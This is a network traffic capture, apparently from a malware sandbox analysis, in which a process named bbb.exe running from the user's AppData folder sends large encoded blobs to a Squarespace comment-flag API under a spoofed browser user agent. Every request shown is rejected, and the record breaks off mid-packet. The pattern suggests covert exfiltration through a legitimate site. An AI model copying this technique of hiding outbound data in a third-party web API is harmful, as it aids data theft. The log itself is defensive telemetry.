2024-09-01 19:56:51 UTC	16306	OUT	Data Raw: 44 39 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 Data Ascii: D9PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwg
2024-09-01 19:56:51 UTC	1	OUT	Data Raw: 72 Data Ascii: r
2024-09-01 19:56:51 UTC	16306	OUT	Data Raw: 35 64 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 Data Ascii: 5dUPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7Ch
2024-09-01 19:56:51 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:51 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BWmfj7YJpxLqODFmMmUzZTBlMDVkN2E3NDI2NjQyMmU3YTQ3NDQ2; Path=/; Secure Set-Cookie: crumb=BWMkPhijfKtFMmUxZmU5MWQxMDVmM2U1ZjM4MTA0N2ZjM2QxMDVm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 2m1OxiDc/KMxC8FqN Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BWMkPhijfKtFMmUxZmU5MWQxMDVmM2U1ZjM4MTA0N2ZjM2QxMDVm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49854	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:51 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:51 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:51 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:51 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:51 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfouNxaLkovqMjVhZTMxZTFmOTlhODgxMWY3NWJlYWVmODEzZDdm; Path=/; Secure Set-Cookie: crumb=BVIna0aD-n5sNGZlNmY5MmQwYTFjMTYzYzk0MWQ0MGRiN2E5MmE2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 9NljwR5s/8y3vehtI Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVIna0aD-n5sNGZlNmY5MmQwYTFjMTYzYzk0MWQ0MGRiN2E5MmE2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49855	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:52 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:52 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:52 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:52 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:52 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:52 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRVEmox4Iar5MTI1ZDUyY2JjOWExNzc5ODE0NTI5ZjZhYmE2MDc2; Path=/; Secure Set-Cookie: crumb=BXlFYDI7xZH3ZmVmZTQyYTc0YWZlOWEzZTE1ZjgwM2JiZGM0OTY4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Nc80i47W/vc5Xc21z Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXlFYDI7xZH3ZmVmZTQyYTc0YWZlOWEzZTE1ZjgwM2JiZGM0OTY4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49856	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:52 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:52 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:52 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:52 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:52 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:52 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BYLrPgCAa3QbODk2ZmYzYmFlYmY4YjQyOWFhMTA2YTA4ZWJkMThh; Path=/; Secure Set-Cookie: crumb=BWgKDt_ONw7dM2U2MTBkMjEzMDc1ZjVlMzkxNDg4YjJkOWVhZmU5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: BrYgxIdv/CWPiYPbb Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BWgKDt_ONw7dM2U2MTBkMjEzMDc1ZjVlMzkxNDg4YjJkOWVhZmU5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49857	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:52 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108764 Expect: 100-continue
2024-09-01 19:56:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:53 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 77 2f 32 73 25 32 42 6f 61 2f 35 58 76 58 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92Yw/2s%2Boa/5XvXbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQw
2024-09-01 19:56:53 UTC	1	OUT	Data Raw: 32 Data Ascii: 2
2024-09-01 19:56:53 UTC	16306	OUT	Data Raw: 42 49 54 32 37 2f 49 67 42 7a 73 36 52 33 4c 35 72 45 67 72 6f 45 74 49 47 70 25 32 42 65 62 4c 7a 50 61 71 46 77 6c 6f 4a 68 72 38 37 6f 46 76 6f 77 47 49 31 74 63 33 6b 56 68 59 4b 36 6d 61 75 53 79 5a 69 65 33 35 63 33 69 57 77 5a 35 6c 78 63 53 74 41 39 4f 45 4e 78 56 63 54 33 64 72 56 78 30 46 47 46 6e 44 78 6f 42 41 4e 78 63 69 38 38 38 39 55 6d 39 75 63 48 25 32 42 41 66 54 63 4d 79 55 6c 67 4d 62 38 37 31 69 6a 56 57 6a 6d 36 52 73 38 39 68 48 42 74 78 73 50 41 31 79 58 4e 35 62 7a 6e 63 76 52 2f 39 45 6b 79 4d 78 6a 68 39 37 4a 6e 34 69 62 53 4c 79 42 7a 66 59 48 5a 31 68 76 68 4b 79 6b 72 36 6b 63 56 39 59 37 59 43 73 32 35 45 6d 4b 5a 79 4d 74 44 7a 42 36 36 31 25 32 42 47 39 7a 63 4d 37 36 58 50 30 73 34 57 6b 35 6e 33 41 38 34 42 4a 69 30 6e Data Ascii: BIT27/IgBzs6R3L5rEgroEtIGp%2BebLzPaqFwloJhr87oFvowGI1tc3kVhYK6mauSyZie35c3iWwZ5lxcStA9OENxVcT3drVx0FGFnDxoBANxci8889Um9ucH%2BAfTcMyUlgMb871ijVWjm6Rs89hHBtxsPA1yXN5bzncvR/9EkyMxjh97Jn4ibSLyBzfYHZ1hvhKykr6kcV9Y7YCs25EmKZyMtDzB661%2BG9zcM76XP0s4Wk5n3A84BJi0n
2024-09-01 19:56:53 UTC	1	OUT	Data Raw: 38 Data Ascii: 8
2024-09-01 19:56:53 UTC	16306	OUT	Data Raw: 30 33 32 56 70 54 62 72 75 62 25 32 42 73 37 37 62 51 58 74 4f 68 76 32 47 66 72 79 58 72 42 37 47 69 6c 4a 49 76 63 6d 63 70 43 34 30 73 45 4e 4b 4a 30 31 6e 6e 67 33 71 41 68 71 63 56 51 43 71 6d 37 56 54 6e 67 4e 38 47 74 43 49 5a 38 73 32 66 42 47 71 35 42 41 76 75 6c 30 4d 55 53 45 79 35 72 36 49 56 53 45 4d 46 38 25 32 42 38 4e 66 69 51 4f 35 67 65 49 35 78 50 4a 54 6e 62 48 38 63 4e 4b 67 70 45 4d 56 4c 66 67 70 42 54 4e 58 72 31 54 62 6f 51 50 77 7a 25 32 42 69 45 74 54 67 68 48 61 45 62 59 50 53 68 4f 39 4b 68 78 4a 46 57 66 69 6e 2f 58 66 53 31 64 49 4f 54 74 47 32 66 49 30 32 43 55 76 66 64 69 57 59 78 45 6f 70 68 58 6c 6d 73 62 55 5a 50 56 6d 43 50 62 31 44 39 61 5a 6a 70 6b 50 78 35 72 47 31 47 54 31 5a 67 6a 32 39 51 2f 57 6d 59 36 5a 44 38 Data Ascii: 032VpTbrub%2Bs77bQXtOhv2GfryXrB7GilJIvcmcpC40sENKJ01nng3qAhqcVQCqm7VTngN8GtCIZ8s2fBGq5BAvul0MUSEy5r6IVSEMF8%2B8NfiQO5geI5xPJTnbH8cNKgpEMVLfgpBTNXr1TboQPwz%2BiEtTghHaEbYPShO9KhxJFWfin/XfS1dIOTtG2fI02CUvfdiWYxEophXlmsbUZPVmCPb1D9aZjpkPx5rG1GT1Zgj29Q/WmY6ZD8
2024-09-01 19:56:53 UTC	1	OUT	Data Raw: 6d Data Ascii: m
2024-09-01 19:56:53 UTC	16306	OUT	Data Raw: 62 35 55 51 31 65 64 49 6e 34 36 7a 6d 30 54 52 42 66 79 48 37 42 6f 6f 53 55 31 6f 50 31 71 65 4a 56 6a 76 4f 51 58 6e 71 62 73 46 63 72 75 6f 74 4f 46 68 57 46 51 4b 64 7a 64 33 76 64 70 49 47 50 74 70 25 32 42 53 49 6d 41 43 53 61 47 57 79 48 64 73 6f 59 59 41 4e 37 39 50 4c 75 65 30 7a 72 59 4f 6d 25 32 42 39 4b 44 65 37 55 34 76 36 45 5a 74 43 54 51 6b 54 58 51 79 4b 4a 65 46 30 6a 79 6f 44 41 72 42 39 52 68 42 43 4a 33 44 37 45 50 67 4e 4d 37 4d 38 30 57 39 52 79 63 4a 38 44 44 51 4e 66 47 53 6c 6c 33 77 31 76 50 68 62 59 74 6e 53 47 7a 42 36 33 4d 54 64 61 34 62 4e 58 67 45 50 66 68 35 50 51 78 48 41 42 57 6f 55 38 76 79 48 66 62 2f 63 72 57 6f 62 44 64 32 52 71 57 62 38 73 2f 62 48 46 6e 4f 49 78 51 58 79 78 62 73 78 43 48 45 68 58 68 64 47 5a 25 Data Ascii: b5UQ1edIn46zm0TRBfyH7BooSU1oP1qeJVjvOQXnqbsFcruotOFhWFQKdzd3vdpIGPtp%2BSImACSaGWyHdsoYYAN79PLue0zrYOm%2B9KDe7U4v6EZtCTQkTXQyKJeF0jyoDArB9RhBCJ3D7EPgNM7M80W9RycJ8DDQNfGSll3w1vPhbYtnSGzB63MTda4bNXgEPfh5PQxHABWoU8vyHfb/crWobDd2RqWb8s/bHFnOIxQXyxbsxCHEhXhdGZ%
2024-09-01 19:56:53 UTC	1	OUT	Data Raw: 56 Data Ascii: V
2024-09-01 19:56:53 UTC	16306	OUT	Data Raw: 6b 6d 74 4e 33 4d 70 4f 38 51 68 71 6f 44 72 47 78 48 6e 58 4e 72 32 71 31 76 4d 70 74 70 33 61 7a 57 57 61 4f 58 36 36 6b 42 25 32 42 4d 75 6d 46 2f 5a 78 4e 70 74 50 73 37 73 59 71 53 6a 72 46 36 37 72 66 6a 77 47 5a 25 32 42 65 62 4c 7a 50 61 71 46 77 6b 30 4d 73 6e 4f 36 31 36 31 4d 6e 78 65 6f 55 64 69 59 77 53 34 79 76 79 56 2f 62 4a 37 73 32 69 53 61 51 56 36 77 47 2f 25 32 42 48 70 6a 61 6a 53 59 52 78 38 42 33 4a 2f 68 56 7a 39 69 73 70 6c 30 56 6f 30 2f 32 39 70 25 32 42 57 44 56 70 51 57 4e 53 6a 54 47 39 6e 79 43 5a 4a 4d 6c 63 33 68 66 4a 72 51 73 75 52 4b 44 6d 74 52 43 39 78 6a 63 38 65 5a 62 34 4f 37 38 62 46 36 65 33 4a 50 36 43 6f 47 72 4e 47 51 79 70 52 72 57 55 5a 6c 30 52 73 6f 50 63 67 67 31 72 7a 45 2f 5a 6d 4d 6f 68 2f 66 6a 61 56 Data Ascii: kmtN3MpO8QhqoDrGxHnXNr2q1vMptp3azWWaOX66kB%2BMumF/ZxNptPs7sYqSjrF67rfjwGZ%2BebLzPaqFwk0MsnO6161MnxeoUdiYwS4yvyV/bJ7s2iSaQV6wG/%2BHpjajSYRx8B3J/hVz9ispl0Vo0/29p%2BWDVpQWNSjTG9nyCZJMlc3hfJrQsuRKDmtRC9xjc8eZb4O78bF6e3JP6CoGrNGQypRrWUZl0RsoPcgg1rzE/ZmMoh/fjaV
2024-09-01 19:56:53 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:53 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BePSbEjs6a3yYjdiODUyYTM5ZWVmOGUwYzFhMTM5NWU2YjJmNTNl; Path=/; Secure Set-Cookie: crumb=BR0AJGJCWgi7YWU4ZTQ2YjQxNWNkMzdhMDJjMDNlYTNlMjczYTBk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: QtetHkKu/rQttwyED Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BR0AJGJCWgi7YWU4ZTQ2YjQxNWNkMzdhMDJjMDNlYTNlMjczYTBk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49858	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:53 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:53 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:53 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:53 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVpRpnAgyYDQMzhjY2IzZmU1ZTNkZGQ5OWUxN2UzMjE1MTU0NjEz; Path=/; Secure Set-Cookie: crumb=BdhBPtmSChz5ZWU3MGVjN2VmMzFkN2EyMWEzODQwNzIyOWExYWJl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: JexRp00D/EAdBTRBl Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdhBPtmSChz5ZWU3MGVjN2VmMzFkN2EyMWEzODQwNzIyOWExYWJl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49859	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:53 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:53 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 5a 39 70 59 47 66 79 6e 57 74 61 73 4e 6b 58 53 55 73 54 5a 30 35 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 